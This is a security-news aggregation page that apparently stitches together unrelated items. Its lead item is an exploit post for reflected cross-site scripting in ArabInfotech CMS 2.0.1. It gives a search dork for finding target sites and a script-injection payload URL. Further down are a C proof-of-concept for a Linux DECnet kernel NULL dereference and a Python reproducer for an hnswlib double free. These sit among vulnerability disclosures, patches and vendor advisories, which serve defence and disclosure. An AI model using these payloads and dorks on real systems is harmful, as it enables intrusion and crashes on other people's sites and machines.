ArabInfotech CMS version 2.0.1 suffers from a cross site scripting vulnerability.

**ArabInfotech CMS 2.0.1 Cross Site Scripting**

Posted Jul 2, 2023

Authored by indoushka

ArabInfotech CMS version 2.0.1 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 670bf364f2d7ff34656860436ff284c800f86d1d679b95be7803858c4d41549d

Download | Favorite | View

**ArabInfotech CMS 2.0.1 Cross Site Scripting**

    ====================================================================================================================================| # Title     : ArabInfotech CMS v 2.0.1 L.L.C Xss Vulnerability                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro)                                                                                        || # Vendor    : http://www.editpubdz.com/                                                                                          |  | # Dork      : intext:"Powered By Editpub"                                                                                        |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] use payload : '"()%26%25<acx><script>alert(/indoushka/);</script>[+] http://127.0.0.1/www/reliancerecruiterscom/job-details.php?id=68%27%22()%26%25%3Cacx%3E%3Cscript%3Ealert(/indoushka/);%3C/script%3E====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,554)
*   Arbitrary (16,117)
*   BBS (2,859)
*   Bypass (1,725)
*   CGI (1,025)
*   Code Execution (7,203)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,328)
*   DoS (23,288)
*   Encryption (2,363)
*   Exploit (51,405)
*   File Inclusion (4,202)
*   File Upload (960)
*   Firewall (821)
*   Info Disclosure (2,742)
*   Intrusion Detection (888)
*   Java (3,007)
*   JavaScript (845)
*   Kernel (6,610)
*   Local (14,412)
*   Magazine (586)
*   Overflow (12,627)
*   Perl (1,423)
*   PHP (5,134)
*   Proof of Concept (2,336)
*   Protocol (3,571)
*   Python (1,526)
*   Remote (30,582)
*   Root (3,573)
*   Rootkit (506)
*   Ruby (611)
*   Scanner (1,633)
*   Security Tool (7,861)
*   Shell (3,168)
*   Shellcode (1,212)
*   Sniffer (893)
*   Spoof (2,193)
*   SQL Injection (16,254)
*   TCP (2,395)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,654)
*   Web (9,600)
*   Whitepaper (3,747)
*   x86 (961)
*   XSS (17,787)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,981)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,782)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (346)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,065)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (483)
*   RedHat (13,489)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,707)
*   UNIX (9,256)
*   UnixWare (186)
*   Windows (6,560)
*   Other

ArabInfotech CMS 2.0.1 Cross Site Scripting

A backup file vulnerability found in UniFi applications (Version 7.3.83 and earlier) running on Linux operating systems allows application administrators to execute malicious commands on the host device being restored.

CVE-2023-28365

A hash collision flaw was found in the IPv6 connection lookup table in the Linux kernel’s IPv6 functionality when a user makes a new kind of SYN flood attack. A user located in the local network or with a high bandwidth connection can increase the CPU usage of the server that accepts IPV6 connections up to 95%.

'2175903?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2023-1206: Invalid Bug ID

A use-after-free flaw was found in the Netfilter subsystem of the Linux kernel when processing named and anonymous sets in batch requests, which can lead to performing arbitrary reads and writes in kernel memory. This flaw allows a local user with CAP_NET_ADMIN capability to crash or potentially escalate their privileges on the system.

CVE-2023-3117

A flaw null pointer dereference in the Linux kernel DECnet networking protocol was found. A remote user could use this flaw to crash the system.

**oss-sec mailing list archives**

_From_: Ornaghi Davide - Betrusted <davide.ornaghi () betrusted it>  
_Date_: Sat, 24 Jun 2023 16:11:36 +0000  

Hi all,



I'm reporting a Null Pointer Dereference vulnerability that I found while attempting to ping localhost by sending a 
Hello message to a local DECnet socket:



\`\`\`
\[45620.986136\] BUG: kernel NULL pointer dereference, address: 0000000000000000
\[45620.986141\] #PF: supervisor read access in kernel mode
\[45620.986143\] #PF: error\_code(0x0000) - not-present page
\[45620.986146\] PGD 0 P4D 0
\[45620.986148\] Oops: 0000 \[#1\] PREEMPT SMP NOPTI
\[45620.986152\] CPU: 6 PID: 37997 Comm: test Tainted: G        W    L    5.19.0-43-generic #44~22.04.1-Ubuntu
\[45620.986155\] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 
11/12/2020
\[45620.986156\] RIP: 0010:dn\_nsp\_send+0x1c9/0x200 \[decnet\]
\[45620.986159\] Code: 74 3e 8d 48 01 f0 0f b1 4a 40 41 0f 94 c6 45 84 f6 74 eb 48 89 d3 49 89 d7 48 83 e3 fe 48 89 55 90 
e8 eb f7 ac c0 48 8b 55 90 <48> 8b 02 48 8b 80 e8 00 00 00 49 89 85 e8 01 00 00 e9 93 fe ff ff
\[45620.986161\] RSP: 0018:ffffc90032abfc90 EFLAGS: 00010246
\[45620.986164\] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000
\[45620.986165\] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000
\[45620.986166\] RBP: ffffc90032abfd00 R08: 0000000000000000 R09: 0000000000000000
\[45620.986167\] R10: 0000000000000000 R11: 0000000000000000 R12: ffff8881aca6f9c0
\[45620.986168\] R13: ffff888118903cc0 R14: 0000000000000000 R15: 0000000000000000
\[45620.986172\] FS:  00007f144e58b740(0000) GS:ffff888339d80000(0000) knlGS:0000000000000000
\[45620.986173\] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
\[45620.986175\] CR2: 0000000000000000 CR3: 0000000226154004 CR4: 0000000000770ee0
\[45620.986185\] PKRU: 55555554
\[45620.986186\] Call Trace:
\[45620.986189\]  <TASK>
\[45620.986191\]  dn\_nsp\_send\_conninit+0x207/0x4c0 \[decnet\]
\[45620.986196\]  \_\_dn\_connect+0x172/0x230 \[decnet\]
\[45620.986220\]  dn\_connect+0x5c/0xa0 \[decnet\]
\[45620.986223\]  \_\_sys\_connect\_file+0x68/0x80
\[45620.986225\]  \_\_sys\_connect+0xb6/0xe0
\[45620.986227\]  ? exit\_to\_user\_mode\_loop+0xf1/0x140
\[45620.986228\]  ? exit\_to\_user\_mode\_prepare+0x3b/0xd0
\[45620.986230\]  ? syscall\_exit\_to\_user\_mode+0x2a/0x50
\[45620.986232\]  ? do\_syscall\_64+0x69/0x90
\[45620.986234\]  \_\_x64\_sys\_connect+0x18/0x30
\[45620.986236\]  do\_syscall\_64+0x59/0x90
\[45620.986237\]  ? exit\_to\_user\_mode\_prepare+0x3b/0xd0
\[45620.986241\]  ? syscall\_exit\_to\_user\_mode+0x2a/0x50
\[45620.986242\]  ? do\_syscall\_64+0x69/0x90
\[45620.986244\]  entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd
\`\`\`

## Bug details

This crash is due to the dn\_nsp\_send function (net/decnet/dn\_nsp\_out.c) which, first off, causes a Denial of Service by 
preventing the release of locks such as the current sock's sk->sk\_lock, but could also lead to Local Privilege 
Escalation under certain conditions.

When first starting a connection with a DECnet socket, the connect() handler \_\_dn\_connect, while building a route, ends 
up calling dst\_alloc (net/decnet/dn\_route.c:1178) which initializes the dst reference counter to 0 instead of 1 (see 
commit 76371d2e3ad1f84426a30ebcd8c3b9b98f4c724f for an explanation).
Later on, dn\_insert\_route is expected to increase the dst refcount, but in reality, it fails to do so, since 
dst\_hold\_and\_use (net/decnet/dn\_route.c:347) actually calls atomic\_inc\_not\_zero on dst->\_\_refcnt, which only works if 
the refcount is not 0. While the refcount hasn't changed, the dst->\_use counter is correctly incremented by 
dst\_use\_noref.

\`\`\`c
static inline void dst\_hold(struct dst\_entry \*dst)
{
    BUILD\_BUG\_ON(offsetof(struct dst\_entry, \_\_refcnt) & 63);
    WARN\_ON(atomic\_inc\_not\_zero(&dst->\_\_refcnt) == 0);            <===
}
\`\`\`

Therefore, a warning gets thrown.
As a consequence, all the following sk\_dst\_get(sk) calls will return NULL since this function also uses 
atomic\_inc\_not\_zero, and returns NULL on failure.
This condition leads to a NPD at net/decnet/dn\_nsp\_out.c:92:

\`\`\`c
if (dn\_route\_output\_sock(&sk->sk\_dst\_cache, &fld, sk, 0) == 0) {
    dst = sk\_dst\_get(sk);
    sk->sk\_route\_caps = dst->dev->features;                        <===   dst is NULL
    goto try\_again;
}
\`\`\`

## Exploitation scenarios

Furthermore, the try\_again label redirects the execution to the following code:

\`\`\`c
if (dst) {
    try\_again:
    skb\_dst\_set(skb, dst);
    dst\_output(&init\_net, skb->sk, skb);        <===
    return;
}
\`\`\`

where the dst->output() function is invoked by dst\_output to send the outgoing packet after the routing decision. In an 
attacker's ideal conditions, where the zero page is mappable, this allows arbitrary code execution.

In more modern systems, the previous scenario can be triggered multiple times to possibly control other reference 
counters and thus trigger further vulnerabilities such as UAF.
For instance, one could force the sock->file (from \_\_sys\_sendto) refcount to wrap around and eventually free it, though 
a definitive exploitation technique is still under study.

## Vulnerable versions

Linux kernels with DECnet support from Linux-4.12-rc7 (commit 76371d2e3ad1f84426a30ebcd8c3b9b98f4c724f) up to 
Linux-6.0.19.
The said subsystem has been removed during the 6.1 merge window because deprecated.

## Proof-of-Concept

The kernel has to be compiled with CONFIG\_DECNET=y and should have a DECnet address assigned (echo -n "1.10" > 
/proc/sys/net/decnet/node\_address):

\`\`\`c
int main() {
    int sockfd;

    if ((sockfd = socket(AF\_DECnet, SOCK\_SEQPACKET, DNPROTO\_NSP)) == -1) {
        perror("socket");
        exit(-1);
    }
    struct sockaddr\_dn sockaddr;
    struct nodeent dp;
    static struct dn\_naddr addr;
    char \*nodename = "turtle";
    addr.a\_addr\[0\] = 10 & 0xFF;
    addr.a\_addr\[1\] = (1 << 2) | ((10 & 0x300) >> 8);
    sockaddr.sdn\_family = AF\_DECnet;
    sockaddr.sdn\_flags  = 0x00;
    sockaddr.sdn\_objnum  = DNOBJECT\_MIRROR;
    sockaddr.sdn\_objnamel  = 0x00;

    dp.n\_addr = (unsigned char \*)&addr.a\_addr;
    dp.n\_length = 2;
    dp.n\_name = nodename;
    dp.n\_addrtype = AF\_DECnet;

    if (connect(sockfd, (struct sockaddr \*)&sockaddr, sizeof(sockaddr)) < 0) {
        perror("socket");
        exit(-1);
    }
    return 0;
}
\`\`\`

Writing a PoC that returns a root shell on devices without SMAP and vm.mmap\_min\_addr is also trivial.

## Bug fix

This was my suggested patch:

\`\`\`diff
--- a/net/decnet/dn\_route.c     2023-06-06 15:55:36.615147110 +0200
+++ b/net/decnet/dn\_route.c     2023-06-06 15:56:00.179416949 +0200
@@ -1175,7 +1175,7 @@ make\_route:
        if (dev\_out->flags & IFF\_LOOPBACK)
                flags |= RTCF\_LOCAL;

-       rt = dst\_alloc(&dn\_dst\_ops, dev\_out, 0, DST\_OBSOLETE\_NONE, 0);
+       rt = dst\_alloc(&dn\_dst\_ops, dev\_out, 1, DST\_OBSOLETE\_NONE, 0);
        if (rt == NULL)
                goto e\_nobufs;
\`\`\`

Also, always make sure that dst isn't NULL after sk\_dst\_get:

\`\`\`diff
--- a/net/decnet/dn\_nsp\_out.c   2023-06-06 22:01:57.212802584 +0200
+++ b/net/decnet/dn\_nsp\_out.c   2023-06-06 22:04:37.138709847 +0200
@@ -89,7 +89,9 @@ try\_again:
        fld.flowidn\_proto = DNPROTO\_NSP;
        if (dn\_route\_output\_sock(&sk->sk\_dst\_cache, &fld, sk, 0) == 0) {
                dst = sk\_dst\_get(sk);
-               sk->sk\_route\_caps = dst->dev->features;
+               if (!dst)
+                       return;
+               sk->sk\_route\_caps = dst->dev->features;
                goto try\_again;
        }
\`\`\`

The DECnet subsystem has been officially removed from all longterm and stable kernel series, starting from 4.14.319, 
4.19.287, 5.4.248, 5.10.185 and 5.15.118.

Best regards,

Davide Ornaghi

**Current thread:**

*   **CVE-2023-3338: Linux Kernel NULL Pointer Dereference in DECnet** _Ornaghi Davide - Betrusted (Jun 24)_
    *   Re: CVE-2023-3338: Linux Kernel NULL Pointer Dereference in DECnet _Peter Philip Pettersson (Jun 24)_

CVE-2023-3338: Linux Kernel NULL Pointer Dereference in DECnet

In Malwarebytes EDR 1.0.11 for Linux, it is possible to bypass the detection layers that depend on inode identifiers, because an identifier may be reused when a file is replaced, and because two files on different filesystems can have the same identifier.

**SUMMARY:**

 In Malwarebytes EDR 1.0.11 for Linux, it is possible to bypass the detection layers that depend on inode identifiers, because an identifier may be reused when a file is replaced, and because two files on different filesystems can have the same identifier.

**AFFECTED VERSIONS**

*   EDR for Linux <= 1.0.11
*   Malwarebytes for Linux <= 1.0.14

**PATCHED VERSIONS**

*   EDR for Linux: 1.0.56

**MITIGATION ADVICE**

**We recommend upgrading the affected endpoints to the patched versions.**

**DETAILS**

**CWE**

**CVS 3.x**

**Vector**

CWE-693: Protection Mechanism Failure

8.2 High

Local

**RECOGNITION**

X41-Dsec

**REFERENCES**

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29147

CVE-2023-29147: CVE-2023-29147 - Malwarebytes EDR for Linux - Detection bypass

The Malwarebytes EDR 1.0.11 for Linux driver doesn't properly ensure whitelisting of executable libraries loaded by executable files, allowing arbitrary code execution. The attacker can set LD_LIBRARY_PATH, set LD_PRELOAD, or run an executable file in a debugger.

**SUMMARY:**

The Malwarebytes EDR 1.0.11 for Linux driver doesn't properly ensure whitelisting of executable libraries loaded by executable files, allowing arbitrary code execution. The attacker can set LD\_LIBRARY\_PATH, set LD\_PRELOAD, or run an executable file in a debugger.

**AFFECTED VERSIONS**

*   EDR for Linux <= 1.0.11
*   Malwarebytes for Linux <= 1.0.14

**PATCHED VERSIONS**

*   EDR for Linux: 1.0.56

**MITIGATION ADVICE**

**We recommend upgrading the affected endpoints to the patched versions.**

**DETAILS**

**CWE**

**CVS 3.x**

**Vector**

CWE-114: Process Control

8.2 High

Local

**RECOGNITION**

X41-Dsec

**REFERENCES**

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29145

CVE-2023-29145: CVE-2023-29145 - Malwarebytes EDR for Linux - Arbitrary code execution

Hnswlib 0.7.0 has a double free in init_index when the M argument is a large integer.

Hi, the hnswlib will crashed when init index if the parameter if too big

import hnswlib

h \= hnswlib.Index(space\='l2', dim\=1)
h.init\_index(max\_elements\=1, ef\_construction\=200, M\=2305843009213693951)
h.add\_items(\[1\], \-1)

the backtrace

    Starting program: /usr/bin/python3 df.py
    [*] Failed to find objfile or not a valid file format: [Errno 2] No such file or directory: 'system-supplied DSO at 0x7ffff7fc1000'
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
    [*] Failed to find objfile or not a valid file format: [Errno 2] No such file or directory: '.gnu_debugdata for /usr/local/lib/python3.10/dist-packages/numpy/core/../../numpy.libs/libgfortran-040039e1.so.5.0.0'
    [New Thread 0x7ffff3bff640 (LWP 1541)]
    [New Thread 0x7ffff33fe640 (LWP 1542)]
    [New Thread 0x7ffff0bfd640 (LWP 1543)]
    [New Thread 0x7fffee3fc640 (LWP 1544)]
    [New Thread 0x7fffe9bfb640 (LWP 1545)]
    [New Thread 0x7fffe73fa640 (LWP 1546)]
    [New Thread 0x7fffe4bf9640 (LWP 1547)]
    double free or corruption (out)
    
    Thread 1 "python3" received signal SIGABRT, Aborted.
    __pthread_kill_implementation (no_tid=0x0, signo=0x6, threadid=0x7ffff7c4f1c0) at ./nptl/pthread_kill.c:44
    44      ./nptl/pthread_kill.c: No such file or directory.
    [ Legend: Modified register | Code | Heap | Stack | String ]
    ───────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
    $rax   : 0x0
    $rbx   : 0x007ffff7c4f1c0  →  0x007ffff7c4f1c0  →  [loop detected]
    $rcx   : 0x007ffff7ce6a7c  →  <pthread_kill+300> mov r13d, eax
    $rdx   : 0x6
    $rsp   : 0x007fffffffd4e0  →  0x007fffffffd680  →  0x007ffff757f680  →  0x00000000000012fd
    $rbp   : 0x602
    $rsi   : 0x602
    $rdi   : 0x602
    $rip   : 0x007ffff7ce6a7c  →  <pthread_kill+300> mov r13d, eax
    $r8    : 0x007fffffffd5b0  →  0x00000000000020 (" "?)
    $r9    : 0x0
    $r10   : 0x8
    $r11   : 0x246
    $r12   : 0x6
    $r13   : 0x16
    $r14   : 0x1
    $r15   : 0x1
    $eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
    $cs: 0x33 $ss: 0x2b $ds: 0x00 $es: 0x00 $fs: 0x00 $gs: 0x00
    ───────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
    0x007fffffffd4e0│+0x0000: 0x007fffffffd680  →  0x007ffff757f680  →  0x00000000000012fd   ← $rsp
    0x007fffffffd4e8│+0x0008: 0x007ffff6782f80  →  0x0000000000000001
    0x007fffffffd4f0│+0x0010: 0x00555555acab00  →  0x0000000000002e ("."?)
    0x007fffffffd4f8│+0x0018: 0x007ffff6782f80  →  0x0000000000000001
    0x007fffffffd500│+0x0020: 0x007ffff73ebfd0  →  0x0000000000000000
    0x007fffffffd508│+0x0028: 0x00555555acc240  →  0x00000000000026 ("&"?)
    0x007fffffffd510│+0x0030: 0x00555555b403c0  →  0x0000000000000000
    0x007fffffffd518│+0x0038: 0x0055555568ad45  →  <PyIter_Next+21> mov r12, rax
    ─────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
       0x7ffff7ce6a73 <pthread_kill+291> mov    edi, eax
       0x7ffff7ce6a75 <pthread_kill+293> mov    eax, 0xea
       0x7ffff7ce6a7a <pthread_kill+298> syscall
     → 0x7ffff7ce6a7c <pthread_kill+300> mov    r13d, eax
       0x7ffff7ce6a7f <pthread_kill+303> neg    r13d
       0x7ffff7ce6a82 <pthread_kill+306> cmp    eax, 0xfffff000
       0x7ffff7ce6a87 <pthread_kill+311> mov    eax, 0x0
       0x7ffff7ce6a8c <pthread_kill+316> cmovbe r13d, eax
       0x7ffff7ce6a90 <pthread_kill+320> jmp    0x7ffff7ce6a02 <__GI___pthread_kill+178>
    [!] Command 'context' failed to execute properly, reason: 'threads'
    gef➤  bt
    #0  __pthread_kill_implementation (no_tid=0x0, signo=0x6, threadid=0x7ffff7c4f1c0) at ./nptl/pthread_kill.c:44
    #1  __pthread_kill_internal (signo=0x6, threadid=0x7ffff7c4f1c0) at ./nptl/pthread_kill.c:78
    #2  __GI___pthread_kill (threadid=0x7ffff7c4f1c0, signo=signo@entry=0x6) at ./nptl/pthread_kill.c:89
    #3  0x00007ffff7c92476 in __GI_raise (sig=sig@entry=0x6) at ../sysdeps/posix/raise.c:26
    #4  0x00007ffff7c787f3 in __GI_abort () at ./stdlib/abort.c:79
    #5  0x00007ffff7cd96f6 in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff7e2bb8c "%s\n") at ../sysdeps/posix/libc_fatal.c:155
    #6  0x00007ffff7cf0d7c in malloc_printerr (str=str@entry=0x7ffff7e2e7b0 "double free or corruption (out)") at ./malloc/malloc.c:5664
    #7  0x00007ffff7cf2ef0 in _int_free (av=0x7ffff7e69c80 <main_arena>, p=0x555555c10410, have_lock=<optimized out>) at ./malloc/malloc.c:4588
    #8  0x00007ffff7cf54d3 in __GI___libc_free (mem=<optimized out>) at ./malloc/malloc.c:3391
    #9  0x00007ffff7218ced in hnswlib::HierarchicalNSW<float>::~HierarchicalNSW (this=0x555555bce8b0, __in_chrg=<optimized out>) at ./hnswlib/hnswalg.h:141
    #10 0x00007ffff7219088 in hnswlib::HierarchicalNSW<float>::~HierarchicalNSW (this=0x555555bce8b0, __in_chrg=<optimized out>) at ./hnswlib/hnswalg.h:140
    #11 Index<float, float>::~Index (this=0x555555c102f0, __in_chrg=<optimized out>) at ./python_bindings/bindings.cpp:188
    #12 std::default_delete<Index<float, float> >::operator() (__ptr=0x555555c102f0, this=<optimized out>) at /usr/include/c++/11/bits/unique_ptr.h:85
    #13 std::unique_ptr<Index<float, float>, std::default_delete<Index<float, float> > >::~unique_ptr (this=<optimized out>, __in_chrg=<optimized out>) at /usr/include/c++/11/bits/unique_ptr.h:361
    #14 pybind11::class_<Index<float, float>>::dealloc(pybind11::detail::value_and_holder&) (v_h=...) at /tmp/pip-build-env-e97etj8q/overlay/local/lib/python3.10/dist-packages/pybind11/include/pybind11/pybind11.h:1872
    #15 0x00007ffff7232ded in pybind11::detail::clear_instance (self=0x7ffff727da30) at /tmp/pip-build-env-e97etj8q/overlay/local/lib/python3.10/dist-packages/pybind11/include/pybind11/detail/class.h:424
    #16 0x00007ffff7233df5 in pybind11::detail::pybind11_object_dealloc (self=0x7ffff727da30) at /tmp/pip-build-env-e97etj8q/overlay/local/lib/python3.10/dist-packages/pybind11/include/pybind11/detail/class.h:457
    #17 0x000055555568c8e1 in ?? ()
    #18 0x000055555568c6dc in ?? ()
    #19 0x00005555557bd1f4 in ?? ()
    #20 0x000055555567e40f in ?? ()
    #21 0x00005555557bcd06 in ?? ()
    #22 0x00005555557b94f6 in Py_FinalizeEx ()
    #23 0x00005555557a9193 in Py_RunMain ()
    #24 0x000055555577f32d in Py_BytesMain ()
    #25 0x00007ffff7c79d90 in __libc_start_call_main (main=main@entry=0x55555577f2f0, argc=argc@entry=0x2, argv=argv@entry=0x7fffffffdeb8) at ../sysdeps/nptl/libc_start_call_main.h:58
    #26 0x00007ffff7c79e40 in __libc_start_main_impl (main=0x55555577f2f0, argc=0x2, argv=0x7fffffffdeb8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffdea8) at ../csu/libc-start.c:392
    #27 0x000055555577f225 in _start ()

CVE-2023-37365: double free bug in init_index · Issue #467 · nmslib/hnswlib

Debian Linux Security Advisory 5442-1 - It was discovered that in some conditions the Flask web framework may disclose a session cookie.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5442-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJune 29, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : flaskCVE ID         : CVE-2023-30861It was discovered that in some conditions the Flask web framework maydisclose a session cookie.For the oldstable distribution (bullseye), this problem has been fixedin version 1.1.2-2+deb11u1.We recommend that you upgrade your flask packages.For the detailed security status of flask please refer toits security tracker page at:https://security-tracker.debian.org/tracker/flaskFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmSdym8ACgkQEMKTtsN8TjYRyhAAncBVfFUWx/LOdmid3NG+YIytJnj/ALdxMDnya+Z6DMZtoBzyw9M1wk5PAtlRuP1/BuwACQHUbSahR7eszOLLyLQOGWh6Qaff7784DpJBwZeTiLtSM+Zh+a5j3h19fYfYyCvcPhjKiLXg80jjQcYMWFttOWBZXNyQ8wpuyGRPT23yt2VaFhO7dy6j/zvPuXlLyMBtfDJOSvhZDZi95E7PtsWaQ6UmmEFUGzUW+dcTR/j9Qknfmxop14Iffv2Obvxf467Ms0wYcP0T26rgmc7FP9VqaHlsfra7HzDl7VU1egfiwJVxxQDNiRhxUoAS4LjF5TgXT8tdVKB5/Y5ibdLLydvWNkky0nsgCAimF3vruZB4ncKDCl4TxBaz+08ENLD/NS1A6LlcSriAWq0u/JSe13Xbpq+oxBll26Mu0PaOU9lwqQeNDj3a7GcqQW65OYDhZgP+GjcKkaSoG0mQ9b3Ni3tIQ14KeG8GUwlr8dKPL4qK658Vm5NXbQvMevVGnzrFg0tqCI/MVA6qSugkF8Mxr2XXnI0n4kWS/yKG7grjVBm3+oNJJcuPdzUkaJFY5S1d47tAmH6xQapnMDZCVJ47YdqnJYz1d97S+T+U2clYK2tka1edLfL3kDQ2wH01YsF2WSh/TRzNEFRVl2APdbkSeU3Y1y/nPt9mdb0oZdUmQDU==puZp-----END PGP SIGNATURE-----

Debian Security Advisory 5442-1

Ubuntu Security Notice 6194-1 - Hangyu Hua discovered that the Flower classifier implementation in the Linux kernel contained an out-of-bounds write vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code. Xingyuan Mo and Gengjia Chen discovered that the io_uring subsystem in the Linux kernel did not properly handle locking when IOPOLL mode is being used. A local attacker could use this to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6194-1  
June 29, 2023

linux-oem-6.1 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-oem-6.1: Linux kernel for OEM systems

Details:

Hangyu Hua discovered that the Flower classifier implementation in the  
Linux kernel contained an out-of-bounds write vulnerability. An attacker  
could use this to cause a denial of service (system crash) or possibly  
execute arbitrary code. (CVE-2023-35788, LP: #2023577)

Xingyuan Mo and Gengjia Chen discovered that the io_uring subsystem in the  
Linux kernel did not properly handle locking when IOPOLL mode is being  
used. A local attacker could use this to cause a denial of service (system  
crash). (CVE-2023-2430)

Wei Chen discovered that the InfiniBand RDMA communication manager  
implementation in the Linux kernel contained an out-of-bounds read  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash). (CVE-2023-2176)

It was discovered that for some Intel processors the INVLPG instruction  
implementation did not properly flush global TLB entries when PCIDs are  
enabled. An attacker could use this to expose sensitive information  
(kernel memory) or possibly cause undesired behaviors. (LP: #2023220)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   linux-image-6.1.0-1015-oem      6.1.0-1015.15  
   linux-image-oem-22.04c          6.1.0.1015.15

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6194-1  
   https://launchpad.net/bugs/2023220  
   https://launchpad.net/bugs/2023577  
   CVE-2023-2176, CVE-2023-2430, CVE-2023-35788

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-oem-6.1/6.1.0-1015.15

Tag

#linux